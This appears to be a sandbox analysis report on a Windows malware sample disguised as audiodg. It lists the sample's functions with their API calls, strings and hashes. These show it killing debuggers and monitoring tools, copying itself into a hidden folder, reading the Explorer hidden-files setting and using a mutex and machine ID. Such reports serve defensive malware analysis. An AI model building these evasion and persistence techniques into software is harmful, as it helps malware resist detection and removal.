                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB83BEC: RegDeleteKeyW.ADVAPI32 ref: 00007FF6DAB83C04
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB83DEC: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF6DAB83DFF
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB83DEC: Process32FirstW.KERNEL32 ref: 00007FF6DAB83E32
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB83DEC: CloseHandle.KERNEL32 ref: 00007FF6DAB83E44
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB83DEC: wcscmp.MSVCRT ref: 00007FF6DAB83E59
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB83DEC: OpenProcess.KERNEL32 ref: 00007FF6DAB83E6F
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB83DEC: TerminateProcess.KERNEL32 ref: 00007FF6DAB83E92
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB83DEC: CloseHandle.KERNEL32 ref: 00007FF6DAB83EA0
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB83DEC: Process32NextW.KERNEL32 ref: 00007FF6DAB83EB3
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB83DEC: CloseHandle.KERNEL32 ref: 00007FF6DAB83EC5
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB8397C: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,00007FF6DAB83AD4), ref: 00007FF6DAB839AC
                                                                                                                                                                                                                                  • Sleep.KERNEL32 ref: 00007FF6DAB8315E
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.1404803306.00007FF6DAB81000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6DAB80000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404210370.00007FF6DAB80000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404895806.00007FF6DAB85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404927542.00007FF6DAB88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404957924.00007FF6DAB89000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1405063489.00007FF6DAB8B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ff6dab80000_audiodg.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                                                                                                                                                                  • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                                                  • API String ID: 2853470409-928700279
                                                                                                                                                                                                                                  • Opcode ID: ffbfc5819e14b0ab2deb7bbbed2b77c509124e792cb4d29f7f9df8b3757df45b
                                                                                                                                                                                                                                  • Instruction ID: 517d28eb8bf204e01204fb4e76b976cb80e01d5d6f74305989c7c7b6e0fa3be1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ffbfc5819e14b0ab2deb7bbbed2b77c509124e792cb4d29f7f9df8b3757df45b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B621A520A1F90395E600EB7CE8A12BD2624AF56741FC001B3E40DC62EBDEAEE5378340
                                                                                                                                                                                                                                  Function 00007FF6DAB8388C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB8370C: GetWindowsDirectoryW.KERNEL32 ref: 00007FF6DAB8374C
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB8370C: GetVolumeInformationW.KERNEL32 ref: 00007FF6DAB837C9
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB8370C: wsprintfW.USER32 ref: 00007FF6DAB8386A
                                                                                                                                                                                                                                  • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAB83A71), ref: 00007FF6DAB838D5
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAB83A71), ref: 00007FF6DAB838EA
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAB83A71), ref: 00007FF6DAB838FD
                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAB83A71), ref: 00007FF6DAB8390D
                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAB83A71), ref: 00007FF6DAB83920
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAB83A71), ref: 00007FF6DAB83935
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAB83A71), ref: 00007FF6DAB83948
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAB83A71), ref: 00007FF6DAB8395D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.1404803306.00007FF6DAB81000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6DAB80000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404210370.00007FF6DAB80000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404895806.00007FF6DAB85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404927542.00007FF6DAB88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404957924.00007FF6DAB89000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1405063489.00007FF6DAB8B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ff6dab80000_audiodg.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                                  • String ID: .exe
                                                                                                                                                                                                                                  • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                                  • Opcode ID: 6ed53865e5a1d7bb9d79adebd20b200707d0e96ed26512feaf5f8c4fc5f8f4da
                                                                                                                                                                                                                                  • Instruction ID: 1815e6cab2211484092455ed4a9cc3faff2bf82546e7da0426b668f6f9cec458
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ed53865e5a1d7bb9d79adebd20b200707d0e96ed26512feaf5f8c4fc5f8f4da
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1114F2162DD8386DB609B79F86476E6361FBC5B84F405072EA4E83A2ADF3CD01AC744
                                                                                                                                                                                                                                  Function 00007FF6DAB82E04 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 32synchronizationCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.1404803306.00007FF6DAB81000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6DAB80000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404210370.00007FF6DAB80000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404895806.00007FF6DAB85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404927542.00007FF6DAB88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404957924.00007FF6DAB89000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1405063489.00007FF6DAB8B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ff6dab80000_audiodg.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                                  • String ID: rbNSpGEsyb
                                                                                                                                                                                                                                  • API String ID: 299056699-189039185
                                                                                                                                                                                                                                  • Opcode ID: a105f404426a54bc7c8964e5747303432de1ce41a6b58a984192f11849bdca06
                                                                                                                                                                                                                                  • Instruction ID: bc9909bec2d0538e5709dad273bf3fab84fac08fe0be38bced867abb2cbdc7f0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a105f404426a54bc7c8964e5747303432de1ce41a6b58a984192f11849bdca06
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F01E92290EE03C2E7309B65E85423D6760FB99B95F440572E98EC2675CE3CD5A68601
                                                                                                                                                                                                                                  Function 00007FF6DAB83DEC Relevance: 13.5, APIs: 9, Instructions: 44processCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.1404803306.00007FF6DAB81000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6DAB80000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404210370.00007FF6DAB80000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404895806.00007FF6DAB85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404927542.00007FF6DAB88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404957924.00007FF6DAB89000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1405063489.00007FF6DAB8B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ff6dab80000_audiodg.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1083639309-0
                                                                                                                                                                                                                                  • Opcode ID: 12138f81dccdef71935c921dffeceae2008cd87afcbf1b1fc49fe44ad88dd535
                                                                                                                                                                                                                                  • Instruction ID: 5e0215a9cc9b182b4a52a5ba597b047a3d10465d529c144fa37ac537a97d92ff
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12138f81dccdef71935c921dffeceae2008cd87afcbf1b1fc49fe44ad88dd535
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F214231A0EE8382E7709B29F84837E6360FBC5B95F004272D69D826A9DF3CD456CB00
                                                                                                                                                                                                                                  Function 00007FF6DAB82EA4 Relevance: 12.0, APIs: 8, Instructions: 31synchronizationCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.1404803306.00007FF6DAB81000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6DAB80000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404210370.00007FF6DAB80000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404895806.00007FF6DAB85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404927542.00007FF6DAB88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404957924.00007FF6DAB89000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1405063489.00007FF6DAB8B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ff6dab80000_audiodg.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 299056699-0
                                                                                                                                                                                                                                  • Opcode ID: 56232084e2091a42e48fc1f46b1074f0ee557b164fbc2c50b3328e3f778c4445
                                                                                                                                                                                                                                  • Instruction ID: b79ba1491e6aef3c8880ac907dabd1698fd430194624ccae908cd18366a5589b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56232084e2091a42e48fc1f46b1074f0ee557b164fbc2c50b3328e3f778c4445
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD01DA2691DE43C3E730AB79E85422D6370FBDAB85F400572E98EC2665CF3CD566CA01
                                                                                                                                                                                                                                  Function 00007FF6DAB83CAC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.1404803306.00007FF6DAB81000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6DAB80000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404210370.00007FF6DAB80000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404895806.00007FF6DAB85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404927542.00007FF6DAB88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404957924.00007FF6DAB89000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1405063489.00007FF6DAB8B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ff6dab80000_audiodg.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                                                  • String ID: Unknown
                                                                                                                                                                                                                                  • API String ID: 4220601557-1654365787
                                                                                                                                                                                                                                  • Opcode ID: 9e3e81d3f7ef19b397d7958b1b3d9d47956c25131cf810e82129a5124b9d494f
                                                                                                                                                                                                                                  • Instruction ID: 623dbb40541422a15be41ded47b42a6ef083ed780b32e7ff23a9a13dceebf323
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e3e81d3f7ef19b397d7958b1b3d9d47956c25131cf810e82129a5124b9d494f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D631D87261DAC586D770DB29E4987AEB3A0F789740F000226DA8DC3B68DF3CD565CB00
                                                                                                                                                                                                                                  Function 00007FF6DAB83A3C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB8370C: GetWindowsDirectoryW.KERNEL32 ref: 00007FF6DAB8374C
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB8370C: GetVolumeInformationW.KERNEL32 ref: 00007FF6DAB837C9
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB8370C: wsprintfW.USER32 ref: 00007FF6DAB8386A
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB8388C: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAB83A71), ref: 00007FF6DAB838D5
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB8388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAB83A71), ref: 00007FF6DAB838EA
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB8388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAB83A71), ref: 00007FF6DAB838FD
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB8388C: CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAB83A71), ref: 00007FF6DAB8390D
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB8388C: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAB83A71), ref: 00007FF6DAB83920
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB8388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAB83A71), ref: 00007FF6DAB83935
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB8388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAB83A71), ref: 00007FF6DAB83948
                                                                                                                                                                                                                                    • Part of subcall function 00007FF6DAB8388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DAB83A71), ref: 00007FF6DAB8395D
                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32 ref: 00007FF6DAB83A81
                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32 ref: 00007FF6DAB83A8C
                                                                                                                                                                                                                                  • CopyFileW.KERNEL32 ref: 00007FF6DAB83AA5
                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32 ref: 00007FF6DAB83ABD
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.1404803306.00007FF6DAB81000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6DAB80000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404210370.00007FF6DAB80000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404895806.00007FF6DAB85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404927542.00007FF6DAB88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404957924.00007FF6DAB89000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1405063489.00007FF6DAB8B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ff6dab80000_audiodg.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                                                                                  • String ID: Services
                                                                                                                                                                                                                                  • API String ID: 3209240227-2319745855
                                                                                                                                                                                                                                  • Opcode ID: be39751b43a88f0d6a23e429432fe74b0459ebc07935f09dc291e70ec118819c
                                                                                                                                                                                                                                  • Instruction ID: 5fe527adceb0c65a9387b496ca304906a6ea8e7b35302b05f0137b867bbafb81
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be39751b43a88f0d6a23e429432fe74b0459ebc07935f09dc291e70ec118819c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E016161A1D98393EA609B38E8503AE6360FB95744F804073D24DC66A6EE2CC21ACB40
                                                                                                                                                                                                                                  Function 00007FF6DAB83B4C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.1404803306.00007FF6DAB81000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6DAB80000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404210370.00007FF6DAB80000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404895806.00007FF6DAB85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404927542.00007FF6DAB88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404957924.00007FF6DAB89000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1405063489.00007FF6DAB8B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ff6dab80000_audiodg.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseOpenValue
                                                                                                                                                                                                                                  • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                                                                                  • API String ID: 779948276-85274793
                                                                                                                                                                                                                                  • Opcode ID: 56df753b757407a9f28e07383f4625f46d64df334b1c9f81eb86b6fd020a95cd
                                                                                                                                                                                                                                  • Instruction ID: 7adabcc1d17f87962b1ce36839497f96d33f4a3aaf605c4d285a7945da638a9d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56df753b757407a9f28e07383f4625f46d64df334b1c9f81eb86b6fd020a95cd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2201297661DA818AD7A08B28F84471AB7A0F789794F501222EB8D83B69DF7DC156CF00
                                                                                                                                                                                                                                  Function 00007FF6DAB813C4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.1404803306.00007FF6DAB81000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6DAB80000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404210370.00007FF6DAB80000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404895806.00007FF6DAB85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404927542.00007FF6DAB88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404957924.00007FF6DAB89000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1405063489.00007FF6DAB8B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ff6dab80000_audiodg.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                  • String ID: @$IsWow64Process$kernel32
                                                                                                                                                                                                                                  • API String ID: 1646373207-1447682865
                                                                                                                                                                                                                                  • Opcode ID: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                                  • Instruction ID: 8c6bd86d5f1314520c5c6c7c32011e20c6e3a3685d64b67e1f0c48991769a7cd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E014F7190E643C6E7308B28F44472D63A0FB86748F945276D68D82695CF3CD56ACF00
                                                                                                                                                                                                                                  Function 00007FF6DAB83FCC Relevance: 7.5, APIs: 5, Instructions: 35processCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.1404803306.00007FF6DAB81000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6DAB80000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404210370.00007FF6DAB80000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404895806.00007FF6DAB85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404927542.00007FF6DAB88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404957924.00007FF6DAB89000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1405063489.00007FF6DAB8B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ff6dab80000_audiodg.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2850635065-0
                                                                                                                                                                                                                                  • Opcode ID: 31f5d79038dc9478e4afa5132ff2ec937677fbee5fe4a85a6cc82bd95e7a1872
                                                                                                                                                                                                                                  • Instruction ID: ae88407886bd99b25d00eab8005c66c846dec8779778743e52d246956e3b3fa9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 31f5d79038dc9478e4afa5132ff2ec937677fbee5fe4a85a6cc82bd95e7a1872
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B6113031A0DA8382E7708F28E48836F63A0FBC9794F004376D69D826A9DF3DD415DB00
                                                                                                                                                                                                                                  Function 00007FF6DAB8370C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.1404803306.00007FF6DAB81000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6DAB80000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404210370.00007FF6DAB80000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404895806.00007FF6DAB85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404927542.00007FF6DAB88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1404957924.00007FF6DAB89000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.1405063489.00007FF6DAB8B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ff6dab80000_audiodg.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                                  • String ID: %08lX%04lX%lu
                                                                                                                                                                                                                                  • API String ID: 3001812590-640692576
                                                                                                                                                                                                                                  • Opcode ID: 2bf9011458a8b05a9254b4e26b90a8e12db43ff2ddd31f5c51e36a325afa16b9
                                                                                                                                                                                                                                  • Instruction ID: 635b4bb0c5c9b99166c7b3e2000eaa75d5e24dcafbc9ef08fe41d4fdec191bfb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2bf9011458a8b05a9254b4e26b90a8e12db43ff2ddd31f5c51e36a325afa16b9
